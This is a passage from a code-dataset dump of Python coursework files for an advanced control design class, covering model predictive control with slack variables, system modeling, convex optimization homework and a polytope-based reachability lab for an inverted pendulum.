length of simulation\nref = []\n\n# Construct reference signal\nfor k in range(Lsim+N+1):\n    if k < 40: \n        ref.append(0)\n    else:\n        ref.append(1)\n\n# Initialize Control Design\n\numpc_closedloop = []\nym = []\nxk_open = np.zeros((nx, N+1)) # to plot open-loop trajectories\nxk_closed = np.zeros((nx, Lsim+1)) # to plot closed-loop trajectories\nxk_closed[:, 0] = x0 # set initial value of closed-loop trajectory\nxk = x0.reshape(2,1)\n\n# simulate MPC controller\nfor t in range(Lsim):\n\n    # Target Algorithm: construct reference preview\n    ref_preview = [ref[j] for j in range(t, t+N+1)]\n    # compute xref and uref based on the future reference\n    xrefk = np.zeros((nx,N+1))\n    urefk = np.zeros((nu,N))\n    for k in range(N+1):\n        Geq = np.vstack( ( np.hstack( (A-np.eye(nx), B) ), np.hstack( (C , np.zeros((ny,nu))) ) ) )\n        beq = np.concatenate([np.zeros((nx,1)), np.asarray(ref_preview[k]).reshape(1,1)], axis = 0) \n\n        # if Geq is invertible\n        out = (np.linalg.inv(Geq) @ beq).flatten()\n        xrefk[:, k] = out[0:nx]\n        if k != N:\n            urefk[:, k] = out[nx:nx+nu]\n\n    # Solve MPC \n    [model, feas, xOpt, uOpt, JOpt] = solve_cftoc(A, B, P, Q, R, N, xk.reshape(2,), x1U, x2U, uL, uU, xrefk, urefk)\n    if not feas:\n        print('The problem is infeasible')\n    U = uOpt[0,0]\n    umpc_closedloop.append(U)\n    \n    if (t < (Lsim-N)):\n        # store open-loop trajectories\n        xk_open[:, 0] = xk.reshape(2,)\n\n        for m in range(N):\n            xk_open[:, m+1] = A @ xk_open[:, m] + B @ uOpt[:, m] \n\n    # Plant model update\n    ym.append(C @ xk)\n    xk = A @ xk + B @ np.asarray(U).reshape(1,1)\n    xk_closed[:, t+1] = xk.reshape(2,)\n    \ndef solve_cftoc_with_slack(A, B, P, Q, R, N, x0, x1U, x2U, uL, uU, xref, uref, tuning_param):\n    \n    model = pyo.ConcreteModel()\n    model.N = N\n    model.nx = np.size(A, 0)\n    model.nu = np.size(B, 1)\n    \n    model.ro_tuning = tuning_param \n    \n    # length of finite optimization problem:\n    model.tIDX = pyo.Set( initialize= range(model.N+1) )\n    model.xIDX = pyo.Set( initialize= range(model.nx) )\n    model.uIDX = pyo.Set( initialize= range(model.nu))\n    \n    # these are 2d arrays:\n    model.A = A\n    model.B = B\n    model.Q = Q\n    model.P = P\n    model.R = R\n    \n    model.xref = xref\n    model.uref = uref \n    \n    # Create state and input variables trajectory:\n    model.x = pyo.Var(model.xIDX, model.tIDX)\n    model.u = pyo.Var(model.uIDX, model.tIDX, bounds=(uL,uU))\n    model.epsU = pyo.Var(model.xIDX, model.tIDX, domain=pyo.NonNegativeReals) # Slack variable is introduced \n    \n    #Objective:\n    def objective_rule(model):\n        costX = 0.0\n        costU = 0.0\n        costTerminal = 0.0\n        CostSoftPenaltyEpsU = 0.0\n        for t in model.tIDX:\n            for i in model.xIDX:\n                for j in model.xIDX:\n                    if t < model.N:\n                        costX += (model.x[i, t] - model.xref[i, t]) * model.Q[i, j] * (model.x[j, t] - model.xref[j, t]) \n        # diagonal penalty on the slack variables; keeping it out of the double\n        # loop avoids cross terms and avoids counting the linear term nx times\n        for t in model.tIDX:\n            for i in model.xIDX:\n                if t < model.N:\n                    CostSoftPenaltyEpsU += model.epsU[i,t] * model.epsU[i,t] # quadratic penalty on the slack\n                    CostSoftPenaltyEpsU += model.ro_tuning[i] * model.epsU[i,t] # linear penalty on the slack\n        \n        for t in model.tIDX:\n            for i in model.uIDX:\n                for j in model.uIDX:\n                    if t < model.N:\n                        costU += (model.u[i, t] - model.uref[i, t]) * model.R[i, j] * (model.u[j, t] - model.uref[j, t])\n        for i in model.xIDX:\n            for j in model.xIDX: \n                costTerminal += (model.x[i, model.N] - model.xref[i, model.N]) * model.P[i, j] * (model.x[j, model.N] - model.xref[j, model.N])\n        \n        return costX + costU + costTerminal + CostSoftPenaltyEpsU \n    \n    model.cost = pyo.Objective(rule = objective_rule, sense=pyo.minimize)\n    \n    # Constraints:\n    def 
equality_const_rule(model, i, t):\n        return model.x[i, t+1] - (sum(model.A[i, j] * model.x[j, t] for j in model.xIDX)\n                                  + sum(model.B[i, j] * model.u[j, t] for j in model.uIDX) ) == 0.0 if t < model.N else pyo.Constraint.Skip\n\n    model.equality_constraints = pyo.Constraint(model.xIDX, model.tIDX, rule=equality_const_rule)\n    model.init_const1 = pyo.Constraint(expr = model.x[0, 0] == x0[0])\n    model.init_const2 = pyo.Constraint(expr = model.x[1, 0] == x0[1])\n    \n    model.state_limit1 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[0, t] <= x1U + model.epsU[0,t]\n                                        if t < N else pyo.Constraint.Skip)\n    model.state_limit2 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x1U <= model.x[0, t]\n                                        if t < N else pyo.Constraint.Skip)\n    model.state_limit3 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[1, t] <= x2U + model.epsU[1,t]\n                                        if t < N else pyo.Constraint.Skip)\n    model.state_limit4 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x2U <= model.x[1, t]\n                                        if t < N else pyo.Constraint.Skip)\n    \n    solver = pyo.SolverFactory('ipopt')\n    results = solver.solve(model)\n    \n    if str(results.solver.termination_condition) == \"optimal\":\n        feas = True\n    else:\n        feas = False\n    \n    xOpt = np.asarray([[model.x[i,t]() for i in model.xIDX] for t in model.tIDX]).T\n    uOpt = np.asarray([model.u[:,t]() for t in model.tIDX]).T\n    epsU_Opt = np.asarray([[model.epsU[i,t]() for i in model.xIDX] for t in model.tIDX]).T\n    \n    JOpt = model.cost()\n    \n    return [model, feas, xOpt, epsU_Opt, uOpt, JOpt]\n\n\n\n\ntuning_param = np.array([0,1]) # The tuning parameter for the linear penalty term on the slack variable \n\nnx = np.size(A, 0) # number of states\nnu = np.size(B, 1) # number of inputs\nny = np.size(C, 0) # number of outputs\n\nx0 = np.array([-0.5, 1])\nref = []\n\n# Construct reference signal\nfor k in range(Lsim+N+1):\n    if k < 40: \n        ref.append(0)\n    else:\n        ref.append(1)\n\n# Initialize Control Design\n\numpc_closedloop = []\nym = []\nepsU_open1 = []\nepsU_open2 = []\nxk_open = np.zeros((nx, N+1)) # to plot open-loop trajectories\nxk_closed = np.zeros((nx, Lsim+1)) # to plot closed-loop trajectories\nxk_closed[:, 0] = x0 # set initial value of closed-loop trajectory\nxk = x0.reshape(2,1)\nfig = plt.figure(figsize=(12, 8))\nax1 = fig.add_subplot(221)\nax2 = fig.add_subplot(222)\n# simulate MPC controller\nfor t in range(Lsim):\n\n    # Target Algorithm: construct reference preview\n    ref_preview = [ref[j] for j in range(t, t+N+1)]\n    # compute xref and uref based on the future reference\n    xrefk = np.zeros((nx,N+1))\n    urefk = np.zeros((nu,N))\n    for k in range(N+1):\n        Geq = np.vstack( ( np.hstack( (A-np.eye(nx), B) ), np.hstack( (C , np.zeros((ny,nu))) ) ) )\n        beq = np.concatenate([np.zeros((nx,1)), np.asarray(ref_preview[k]).reshape(1,1)], axis = 0) \n\n        # if Geq is invertible\n        out = (np.linalg.inv(Geq) @ beq).flatten()\n        xrefk[:, k] = out[0:nx]\n        if k != N:\n            urefk[:, k] = out[nx:nx+nu]\n\n    # Solve MPC \n    [model, feas, xOpt, epsU_Opt, uOpt, JOpt] = solve_cftoc_with_slack(A, B, P, Q, R, N, xk.reshape(2,), x1U, x2U, uL, uU, xrefk, urefk, tuning_param)\n    if not feas:\n        print('The problem is infeasible')\n    U = uOpt[0,0]\n    umpc_closedloop.append(U)\n    \n    if (t < (Lsim-N)):\n        epsU_open1.append(epsU_Opt[0, 0])\n        epsU_open2.append(epsU_Opt[1, 0])\n        # plot open-loop trajectories\n        xk_open[:, 0] = xk.reshape(2,)\n\n        for m in range(N):\n            xk_open[:, m+1] = A @ xk_open[:, m] + B @ uOpt[:, m]\n\n        line1 = ax1.plot(range(t, t+len(ref_preview) ), xk_open[0,:], 'o-', color='b')\n        line2 = ax2.plot(range(t, 
t+len(ref_preview) ), xk_open[1,:], 'o-', color='b')\n\n    # Plant model update\n    ym.append(C @ xk)\n    xk = A @ xk + B @ np.asarray(U).reshape(1,1)\n    xk_closed[:, t+1] = xk.reshape(2,)\n    \n##################################################################################################################\n##################################################################################################################\n# plot closed-loop trajectories\nline11 = ax1.plot(range(Lsim), xk_closed[0, :Lsim], 'o-', color='r')\nax1.legend([line1[0], line11[0]], ['open-loop trajectory', 'closed-loop trajectory'])\nax1.set_ylabel('x1')\nline22 = ax2.plot(range(Lsim), xk_closed[1, :Lsim], 'o-', color='r')\nax2.legend([line2[0], line22[0]], ['open-loop trajectory', 'closed-loop trajectory'])\nax2.set_ylabel('x2')\n# plt.show()\n\n# Plot Results\nax12 = fig.add_subplot(223)\nax22 = fig.add_subplot(224)\nax12.step(range(len(umpc_closedloop)), umpc_closedloop,'r')\nax12.legend(['u'])\nax22.step(range(len(ym)), np.asarray(ym).reshape(Lsim,), 'r')\nax22.step(range(len(ref)), ref, 'b--')\nax22.legend(['y', 'r'])  # label the two step plots in the order they were drawn\nplt.tight_layout()\nplt.show()\n\n# print('x1=', xrefk[0,:])\n# print('x2=', xrefk[1,:])\n# print('u=', urefk)\nfig = plt.figure(figsize=(8, 6))\nprint(len(epsU_open1))\nplt.plot(range(len(epsU_open1)), epsU_open1) # slack variable\nplt.plot(range(len(epsU_open2)), epsU_open2) # slack variable\nplt.legend(['epsU1', 'epsU2'])\nplt.show()\n"
},
{
"alpha_fraction": 0.5226244330406189,
"alphanum_fraction": 0.5778927206993103,
"avg_line_length": 24.766666412353516,
"blob_id": "98c24ad906d4916f30a7b57ade790af888a51bdc",
"content_id": "365b2af74cfe3ae0f6f6ec7232d45d4e6c6db033",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3094,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 120,
"path": "/py_files/HW1_modeling.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# %% P1 \n\nfrom numpy import sin,cos,tan,arcsin \nimport numpy as np \nimport sympy as sym \nimport matplotlib.pyplot as plt \n\nm,l,g,a,k,d,beta = 2,6,9.81,3,1.5,1,0.1\n\ndef EquilPoint(theta2_bar, alpha_bar):\n Fsd_bar = (m * g* l *sin(theta2_bar) +alpha_bar) / (a * cos(theta2_bar))\n theta1_bar = arcsin(sin(theta2_bar) - Fsd_bar/(k*a))\n T_bar = - (m*g*l * sin(theta1_bar) + a*cos(theta1_bar) * Fsd_bar)\n return theta1_bar, T_bar\n\n# print(EquilPoint(0.1,0.5))\n\n# %% \ntheta1dot, theta2dot = 0,0\ndef LinearizeModel(theta2,alpha):\n theta1, T = EquilPoint(theta2,alpha)\n\n x1, x2, x3, x4, u1, u2 = sym.symbols('x1 x2 x3 x4 u1 u2')\n f = sym.Matrix(\n [x2, \n (m*g*l * sym.sin(x1) + a**2*sym.cos(x1) *(k*(sym.sin(x3) -sym.sin(x1))+ d*(x4-x2)) + u1)/ (m*l**2),\n x4,\n (m*g*l*sym.sin(x3) - a**2*sym.cos(x3)*(k*(sym.sin(x3)-sym.sin(x1))+d*(x4-x2))+u2+beta*x4**2)/(m*l**2)]\n )\n A = f.jacobian([x1,x2,x3,x4,u1,u2]).subs([\n (x1,theta1),(x2,theta1dot),(x3,theta2),(x4,theta2dot),(u1,T),(u2,alpha)\n ])\n\n # WHY DOES A RELATED TO U1,U2????\n B = f.jacobian([u1,u2]).subs([\n (x1,theta1),(x2,theta1dot),(x3,theta2),(x4,theta2dot),(u1,T),(u2,alpha)\n ])\n C = [1,0,0,0]\n D = [0,0]\n return A,B,C,D,theta1,T\n\ntheta2_bar = 0.1\nalpha_bar = 0.5\n# print(LinearizeModel(theta2_bar,alpha_bar))\n\n# %% \ndef bldgHTM(T, u1,u2,q,mz,cz,cp):\n Tdot = (q + cp*u1*(u2-T))/(mz*cz)\n\nmz, cz, Ts, cp = 100,20,0.1,1000\n\ndef eulerDiscretization(T,q,u1,u2):\n T_KplusOne = (1-cp*Ts/(mz*cz)*u1) *T + Ts/(mz*cz)*(q+cp*u1*u2)\n return T_KplusOne\n\n# %% P3 \nlr = 1.738\ndt = 0.1 \ndef carModel(beta,a,x,y,psi,v):\n x_dot = v*cos(psi+beta)\n y_dot = v*sin(psi+beta)\n psi_dot = v/lr*sin(beta)\n v_dot = a \n return x+x_dot*dt, y+y_dot*dt,psi+psi_dot*dt,v+v_dot*dt\n\n# print(carModel(.1, 2, 5, 2,10,0.1))\nfrom scipy.io import loadmat \nData = loadmat('Data/sineData.mat')\na = Data['a']\nbeta = Data['beta']\ntime = Data['time']\nTs = 0.1 \nNum_steps = len(time)\n\ndef sim(time,a,beta,x0):\n \n x,y,psi,v = x0 \n # initialize the arrays\n xtrend, ytrend, psi_trend,v_trend = [x],[y],[psi],[v]\n # use the function to iterate \n for i in range(Num_steps-1):\n x,y,psi,v = carModel(beta[i],a[i],x,y,psi,v)\n xtrend.append(x)\n ytrend.append(y)\n psi_trend.append(psi)\n v_trend.append(v)\n\n # return np.asarray(xtrend),np.asarray(ytrend),np.asarray(psi_trend),np.asarray(v_trend)\n return xtrend,ytrend,psi_trend,v_trend\n# call the function \nx,y,psi,v = 0,0,0,0\n# x0 = np.array([x,y,psi,v])\nx0 = [x,y,psi,v]\nxtrend,ytrend,psi_trend,v_trend = sim(time,a,beta,x0)\n\n# %% plot \n\nif False:\n N_plot = 200\n plt.subplot(411)\n plt.plot(time,xtrend)\n plt.ylabel('x')\n plt.subplot(412)\n plt.plot(time,ytrend)\n plt.ylabel('y')\n\n plt.subplot(413)\n plt.plot(time,psi_trend)\n plt.ylabel('psi')\n plt.subplot(414)\n plt.plot(time,v_trend)\n plt.ylabel('speed')\n\n # plt.show()\n\n plt.plot(xtrend,ytrend)\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title('Path of Car')\n # plt.show()\n\n\n"
},
{
"alpha_fraction": 0.5421215891838074,
"alphanum_fraction": 0.592306911945343,
"avg_line_length": 31.842105865478516,
"blob_id": "700384bbb45017c622667ff1603c07b816066655",
"content_id": "7ef0db236e498c57136f989e832606dec23b5111",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9983,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 304,
"path": "/py_files/HW2_optimization1.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import numpy as np \nimport scipy as cp \nfrom scipy.optimize import linprog\n\nimport cvxopt\n\nf = np.ones((3,)) # 1D array\nA = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, -1], [-1, 1, -1]]) # 2D array\nb = np.array([-2,1,3,-4]) # 1D array\n# default bound is (0, None), so here we need to specify bound as (None, None), \n# since all the bounds all already considered in the inequality constraints \nopt1 = cp.optimize.linprog(c=f, A_ub=A, b_ub=b, bounds=(None, None), method='simplex')\n# print('x*=', opt1.x)\n# print('J*=', opt1.fun)\n\n# %% qp problems \nn = 4 # dimenstion of x\nA = np.array([[-0.54, -1.81, 0.25, -0.46],\n [-0.38, 0.37, -2.48, -0.68],\n [-1.31, 0.74, -1.57, 0.28],\n [-0.31, -0.02, 0.75, 0.20]])\nb = np.array([ 0.40, -2.45, -0.23, 0.98])\nl_i = -0.5 \nu_i = 0.5\n\nP = 2 * A.T @A \nq = -2 * A.T @b\nG = np.concatenate([np.eye(4), -np.eye(4)],axis= 0)\nh = np.concatenate([np.ones((n,1))*u_i,np.ones((n,1))*-l_i],axis=0)\n\nP = cvxopt.matrix(P,tc = 'd')\nq = cvxopt.matrix(q,tc = 'd')\nG = cvxopt.matrix(G,tc = 'd')\nh = cvxopt.matrix(h,tc = 'd')\nsol = cvxopt.solvers.qp(P,q,G,h)\n# print('x*=', sol['x'])\n# print('p*=', sol['primal objective'] + b.T @b)\n# ----------pay attention to b.T @b here -----------\n\nxstar = (np.linalg.inv((A.T @ A))) @ (A.T.dot(b)) # Analytical solution of unconstrained least-squares \nxstar[xstar > u_i] = u_i # projection: set any entries that are greater than 0.5 to 0.5\nxstar[xstar < l_i] = l_i # projection: set any entries that are less than -0.5 to -0.5\n\n# Compare performance (i.e. cost function)\n# print('x_analytical:', xstar) # analytical solution with projection \n# print('x_cvxopt:', sol['x']) # direct solution from cvxopt\n# print(np.linalg.norm(A @ np.reshape(sol['x'],(4,)) - b))\n# print(np.linalg.norm(A @ xstar - b))\n\n# %% Problem2 \nfrom scipy.io import loadmat \n\nData = loadmat('Data/etch2169.mat')\nRoomTempData = Data['RoomTempData']\nFanData = Data['FanData']\nSupplyTempData = Data['SupplyTempData']\n\n\nfrom datetime import date\nfrom datetime import datetime as dt\n\n# datenum is a function which converts date stings and date vectors into serial date numbers.\n# Date numbers are serial days elapsed from some reference time. 
\n\ndef datenum(d):\n    return 366 + d.toordinal() + (d - dt.fromordinal(d.toordinal())).total_seconds()/(24*60*60)\n\nd_start = dt.strptime('2018-9-9 10:1','%Y-%m-%d %H:%M')\nd_end = dt.strptime('2018-9-9 15:59','%Y-%m-%d %H:%M')\nd_start_plus_onemin = dt.strptime('2018-9-9 10:2','%Y-%m-%d %H:%M')\n\nTS = datenum(d_start_plus_onemin) - datenum(d_start)\nTimeQuery = np.arange(start=datenum(d_start), stop=datenum(d_end), step=TS)\n\nimport matplotlib.pyplot as plt \nif False:\n    counts, bins = np.histogram(np.diff(RoomTempData[:,0]))\n    plt.hist(bins[:-1],bins,weights=counts)\n    # plt.show()\n\nfrom scipy import interpolate\n\nxData = np.cumsum(np.hstack([np.zeros((1,)), 0.1+np.random.rand(19,)]))\nyTmp = np.hstack([np.sort(3*np.random.rand(10,1)), np.flipud(np.sort(3*np.random.rand(10,1)))])  # flipud gives a descending column (fliplr is a no-op on a single column)\nyData = yTmp.flatten()\nxQuery = np.arange(start=0.1, stop=np.max(xData), step=0.2)\n\nf_interp = interpolate.interp1d(xData, yData, 'linear')\nyInterpLinear = f_interp(xQuery)\n\nf_spline = interpolate.UnivariateSpline(xData, yData)\nyInterpSpline = f_spline(xQuery)\n\nif False:\n    plt.subplot(2,1,1)\n    plt.plot(xData, yData, 'k*', xQuery, yInterpLinear, '-or')\n    plt.legend(['Data Points', 'Linear Interpolated Values'])\n    plt.ylabel('y')\n    plt.subplot(2,1,2)\n    plt.plot(xData, yData, 'k*', xQuery, yInterpSpline, '-or')\n    plt.legend(['Data Points', 'Spline Interpolated Values'])\n    plt.xlabel('x')\n    plt.ylabel('y')\n    plt.show()\n\ntime_T = RoomTempData[:,0]\ntime_u1 = FanData[:,0]\ntime_u2 = SupplyTempData[:,0]\n\ndata_T = RoomTempData[:,1]\ndata_u1 = FanData[:,1]\ndata_u2 = SupplyTempData[:,1]\n\n# spline interpolate \nfun_T = interpolate.UnivariateSpline(time_T,data_T)\nspline_T = fun_T(TimeQuery)\n\nfun_u1 = interpolate.UnivariateSpline(time_u1,data_u1)\nspline_u1 = fun_u1(TimeQuery)\n\nfun_u2 = interpolate.UnivariateSpline(time_u2,data_u2)\nspline_u2 = fun_u2(TimeQuery)\n\nif False:\n    plt.plot(TimeQuery,spline_T,'-or')\n    plt.plot(time_T,data_T)\n    plt.show()\n\nN = 360 \ndef bldgIdentification(Tdata,u1Seq,u2Seq):\n    b = -np.diff(Tdata)\n    # elementwise products: using @ here would collapse the sequences to scalars\n    a2 = -np.multiply(u1Seq,u2Seq)\n    a1 = np.multiply(u1Seq,Tdata[0:-1])\n    A = np.concatenate([np.reshape(a1,(len(a1),1)),np.reshape(a2,(len(a2),1))],axis= 1)\n    P = 2 * A.T @ A \n    q = -2 * A.T @ b\n    P = cvxopt.matrix(P,tc='d')\n    q = cvxopt.matrix(q,tc='d')\n    sol = cvxopt.solvers.qp(P,q)\n    estParm = sol['x']\n    return estParm\n\nTdata = RoomTempData[:,1]\nu1Seq = FanData[0:-1,1]\nu2Seq = SupplyTempData[0:-1,1]\n# print(bldgIdentification(Tdata,u1Seq,u2Seq))\n
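\n# Added check (illustrative sketch): fit the parameters, then score the\n# one-step-ahead prediction T[k+1] ~ T[k] - a1*u1*T[k] + a2*u1*u2.\nest = np.array(bldgIdentification(Tdata, u1Seq, u2Seq)).flatten()\nT_pred = Tdata[:-1] - est[0]*u1Seq*Tdata[:-1] + est[1]*u1Seq*u2Seq\nprint('RMS one-step error:', np.sqrt(np.mean((T_pred - Tdata[1:])**2)))\n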
\n# %% P4\n\ndef buildLinClass(G1,G2):\n    nf, p1 = np.shape(G1)\n    _, p2 = np.shape(G2)\n    P = p1+p2\n    \n    # cost vector over the decision variables (c_1..c_nf, b, t_1..t_P)\n    c = np.concatenate([np.zeros(nf+1),np.ones(P)],axis= 0)\n\n    # A matrix for 3 constraints: tk >= 0; c.T vk + b + tk >= 1 (group 1);\n    # c.T vk + b - tk <= -1 (group 2); group-1 slacks occupy the first p1\n    # t-columns and group-2 slacks the last p2, each entering with a -1\n    A = np.concatenate(\n        [\n            np.concatenate([np.zeros((P,nf+1)),-np.eye(P)],axis= 1),\n            np.concatenate([-G1.T,-np.ones((p1,1)),-np.eye(p1),np.zeros((p1,p2))],axis=1),\n            np.concatenate([G2.T,np.ones((p2,1)),np.zeros((p2,p1)),-np.eye(p2)],axis=1)\n        ],axis= 0\n    )\n    b = np.concatenate(\n        [np.zeros((P,1)),-np.ones((p1,1)),-np.ones((p2,1))],\n        axis= 0\n    )\n\n    c = cvxopt.matrix(c,tc = 'd')\n    A = cvxopt.matrix(A,tc = 'd')\n    b = cvxopt.matrix(b,tc = 'd')\n\n    sol = cvxopt.solvers.lp(c,A,b)\n    xOpt = sol['x']\n    c = np.array(xOpt[:nf]).flatten()\n    b = np.array(xOpt[nf]).flatten()\n    t = np.array(xOpt[nf+1:]).flatten()\n\n    return c,b,t\n\nnF = 2\nnP = 100\ncTrue = np.random.randn(nF,1)\nbTrue = np.random.randn(1,1)\nPop = np.random.randn(nF, nP) \n\nLPop = cTrue.T@Pop + bTrue\nidx_pos = np.argwhere(LPop>0)\nidx_neg = np.argwhere(LPop<0)\n\nG1 = Pop[:, idx_pos[:,1]] # create the populations based on their L-value\nG2 = Pop[:, idx_neg[:,1]] # create the populations based on their L-value\n\n[cEst, bEst, tAdjust] = buildLinClass(G1,G2)\n\nmax(abs(tAdjust)) # should be 0 (or very close)\nf1Min = np.min(Pop[0,:]) # minimum age\nf1Max = np.max(Pop[0,:]) # maximum age\nf2Min = np.min(Pop[1,:]) # minimum number of movies\nf2Max = np.max(Pop[1,:]) # maximum number of movies\n\nif False:\n    plt.plot(np.array([f1Min-1, f1Max+1]), -(cEst[0]*np.array([f1Min-1, f1Max+1])+bEst)/cEst[1],'b')\n    plt.plot(G1[0,:],G1[1,:],'b*')\n    plt.plot(G2[0,:],G2[1,:],'ro')\n    plt.xlim([f1Min-0.1, f1Max+0.1])\n    plt.ylim([f2Min-0.1, f2Max+0.1])\n    plt.axis('equal') \n    plt.show()\n\nif False:\n    nF = 2\n    nP = 100\n    nOut = np.int(0.1*nP)\n    cTrue = np.random.randn(nF,1)\n    bTrue = np.random.randn(1,1)\n    Pop = np.random.randn(nF, nP)\n    Noise = np.asarray([np.random.randn(1) if i < nOut else 0.0 for i in range(nP)], dtype=object)\n\n    LPop = cTrue.T@Pop + bTrue + Noise # corrupt some L-values with noise\n    idx_pos = np.argwhere(LPop>0)\n    idx_neg = np.argwhere(LPop<0)\n\n    G1 = Pop[:, idx_pos[:,1]] # create the populations based on their L-value\n    G2 = Pop[:, idx_neg[:,1]] # create the populations based on their L-value\n\n    [cEst, bEst, tAdjust] = buildLinClass(G1,G2)\n\n    max(abs(tAdjust)) # likely nonzero, and > 1, dealing with non-separability \n    f1Min = min(Pop[0,:]) # minimum age\n    f1Max = max(Pop[0,:]) # maximum age\n    f2Min = min(Pop[1,:]) # minimum number of movies\n    f2Max = max(Pop[1,:]) # maximum number of movies\n\n    plt.plot(np.array([f1Min-1, f1Max+1]), -(cEst[0]*np.array([f1Min-1, f1Max+1])+bEst)/cEst[1],'b')\n    plt.plot(G1[0,:],G1[1,:],'b*')\n    plt.plot(G2[0,:],G2[1,:],'ro')\n    plt.xlim([f1Min-0.1, f1Max+0.1])\n    plt.ylim([f2Min-0.1, f2Max+0.1])\n    plt.axis('equal')\n    plt.show()\n\n# P8 \n# test = np.arange(12).reshape((2,6))\n# print(np.size(test,1))\n\ndef reg1Inf(A1,b1,Ainf,binf,Ac,bc):\n    # the problem transformed to:\n    # min over (z1..z_nx, t1..t_n1, t_inf) of t1+...+t_n1 + t_inf\n    # with t_k >= |A1 z - b1|_k (1-norm part)\n    # and t_inf >= |Ainf z - binf|_k for every k (inf-norm part)\n\n    n_1, nx = np.shape(A1)\n    n_inf, _ = np.shape(Ainf)\n    nc, _ = np.shape(Ac)\n\n    c = np.concatenate(\n        [\n            np.zeros(nx),np.ones(n_1),np.array((1,))\n        ],axis= 0\n    )\n    # note the slack signs: every row bounding an absolute value carries a -1\n    # on its slack column, and the zero blocks are (rows, n_1) wide\n    A = np.concatenate(\n        [\n            np.concatenate([A1,-np.eye(n_1),np.zeros((n_1,1))],axis=1),\n            np.concatenate([-A1,-np.eye(n_1),np.zeros((n_1,1))],axis=1),\n            np.concatenate([Ainf,np.zeros((n_inf,n_1)),-np.ones((n_inf,1))],axis= 1),\n            np.concatenate([-Ainf,np.zeros((n_inf,n_1)),-np.ones((n_inf,1))],axis= 1),\n            np.concatenate([Ac,np.zeros((nc,n_1)),np.zeros((nc,1))],axis=1)\n        ],axis = 0\n    )\n    b = np.concatenate([b1,-b1,binf,-binf,bc],axis=0)\n\n    c = cvxopt.matrix(c,tc='d')\n    A = cvxopt.matrix(A,tc='d')\n    b = cvxopt.matrix(b,tc='d')\n\n    
sol = cvxopt.solvers.lp(c,A,b)\n    xOpt = sol['x']\n    J = sol['primal objective']\n    return xOpt, J\n\na1 = np.zeros((3,3))\nb1 = np.array([0,0,0]).reshape((3,1))\nainf = np.array([[2,0,-1],[1,-1,0]])\nbinf = np.array([1,2]).reshape((2,1))\nac = np.array([[1,-1,1],[-1,-1,0]])\nbc = np.array([-1,-1]).reshape((2,1))\nxOpt, J = reg1Inf(a1,b1,ainf,binf,ac,bc)\nprint('xOpt: ',xOpt)\nprint('J* = ',J)
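\n\n# Added check (illustrative sketch): with A1 = 0 the 1-norm slacks vanish, so\n# J* should equal the minimized infinity norm max|ainf z - binf|.\nz = np.array(xOpt[:3]).flatten()\nprint(np.max(np.abs(ainf @ z - binf.flatten())))  # compare with J*\n"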
},
{
"alpha_fraction": 0.5498955249786377,
"alphanum_fraction": 0.5703909993171692,
"avg_line_length": 28.827892303466797,
"blob_id": "d711316308d6bd168c770b41a387e488cf228ba6",
"content_id": "df1dc97057fdf7da15f99a4e5d6c0ba9bceee7b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10051,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 337,
"path": "/py_files/lab10_mpc_reachability.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# %%\n# Lab 10: Reachability Analysis for Constrained Inverted Pendulum Model (Solution) \n\n# x1 is the angle of the pendulum, \n# x2 is the angular velocity of the pendulum, and \n# u is the speed of the cart.\n\n# %%\nimport numpy as np\nimport scipy.signal\nimport scipy.linalg\nfrom scipy.integrate import solve_ivp\nimport matplotlib.pyplot as plt\nimport polytope as pt\n\nTs = 0.1 # Ts is the discrete sample-time. \n\nAc = np.array([[0, 1],\n [2.5, -0.05]])\nBc = np.array([[0],\n [2.5]])\nCc = np.zeros((1,2))\nDc = np.zeros((1,1))\nsystem = (Ac, Bc, Cc, Dc)\nA, B, C, D, dt = scipy.signal.cont2discrete(system, Ts)\n\nnx = np.size(A,0) # number of states\nnu = np.size(B,1) # number of inputs\n\nQ = np.eye(2)\nR = np.array([1])\n\nuU = np.pi/10\nuX1 = np.pi/4\nuX2 = np.pi/2\n\ndef dlqr(A, B, Q, R):\n # solve Discrete Algebraic Riccatti equation \n P = scipy.linalg.solve_discrete_are(A, B, Q, R)\n\n # compute the LQR gain\n K = scipy.linalg.inv(B.T @ P @ B + R) @ (B.T @ P @ A)\n\n # stability check \n eigVals, eigVecs = scipy.linalg.eig(A - B @ K)\n return K, P\n\nFinf, Pinf = dlqr(A, B, Q, R)\n\nAcl = A - B @ Finf\n\n# %% \n# Polytope tools \nx1U = np.pi/4\nx2U = np.pi/2\nuU = np.pi/10\n\n# constraint sets represented as polyhedra\n# state constraint\nX = pt.Polytope(np.array([[1.0, 0], \n [0, 1.0],\n [-1, 0],\n [0, -1]]), \n np.array([[x1U], \n [x2U],\n [x1U],\n [x2U]])) \nU = pt.Polytope(np.array([1, -1]).reshape(2,1),\n np.array([uU, uU]).reshape(2,1))\n\n\n# Helper Function:\n\ndef minkowski_sum(X, Y):\n\n # Minkowski sum between two polytopes based on \n # vertex enumeration. So, it's not fast for the\n # high dimensional polytopes with lots of vertices.\n V_sum = []\n if isinstance(X, pt.Polytope):\n V1 = pt.extreme(X)\n else:\n # assuming vertices are in (N x d) shape. N # of vertices, d dimension\n V1 = X\n \n if isinstance(Y, pt.Polytope):\n V2 = pt.extreme(Y)\n else:\n V2 = Y\n\n for i in range(V1.shape[0]):\n for j in range(V2.shape[0]):\n V_sum.append(V1[i,:] + V2[j,:])\n return pt.qhull(np.asarray(V_sum))\n\n# %% positive invariant set \ndef precursor(Xset, A, Uset=pt.Polytope(), B=np.array([])):\n if not B.any():\n return pt.Polytope(Xset.A @ A, Xset.b)\n else:\n tmp = minkowski_sum( Xset, pt.extreme(Uset) @ -B.T )\n return 